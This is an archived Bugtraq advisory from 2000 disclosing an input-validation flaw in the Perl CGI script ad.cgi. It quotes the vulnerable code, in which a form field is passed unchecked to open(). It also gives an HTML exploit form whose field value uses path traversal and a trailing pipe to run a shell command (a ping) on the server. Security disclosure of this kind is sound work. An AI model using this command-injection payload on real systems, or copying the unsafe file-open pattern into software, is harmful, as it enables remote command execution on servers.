[18021] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Insecure input validation in ad.cgi

daemon@ATHENA.MIT.EDU (rpc)
Tue Dec 12 15:32:57 2000

Content-Type: text/plain; charset="iso-8859-1"
Content-Disposition: inline
Content-Transfer-Encoding: 7bit
MIME-Version: 1.0
Message-ID:  <20001211230824.C5CC524C629@lists.securityfocus.com>
Date:         Mon, 11 Dec 2000 15:10:22 GMT
Reply-To: rpc <h@ckz.org>
From: rpc <h@ckz.org>
To: BUGTRAQ@SECURITYFOCUS.COM

Hi,

ad.cgi from "Scripts by Tammie's HUSBAND" contains an insecure input validation
vulnerability.

Information on ad.cgi is available at:
http://www.conservatives.net/atheist/scripts/index.html?ads

----code snippet----
$filename = "$FORM{'file'}";
$datafile = "$basedir" . "$filename";
...
open (INFO, "$datafile");
-----------------

Exploit:

<html>
<form action="http://www.conservatives.net/someplace/ad.cgi" method=POST>
<h1>ad.cgi exploit</h1>
Command: <input type=text name=file value="../../../../../../../../bin/ping -c
5 www.foo.com|">
<input type=submit value=run>
</form>
</html>


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[18021] in bugtraq

Insecure input validation in ad.cgi

daemon@ATHENA.MIT.EDU (rpc)Tue Dec 12 15:32:57 2000

daemon@ATHENA.MIT.EDU (rpc)
Tue Dec 12 15:32:57 2000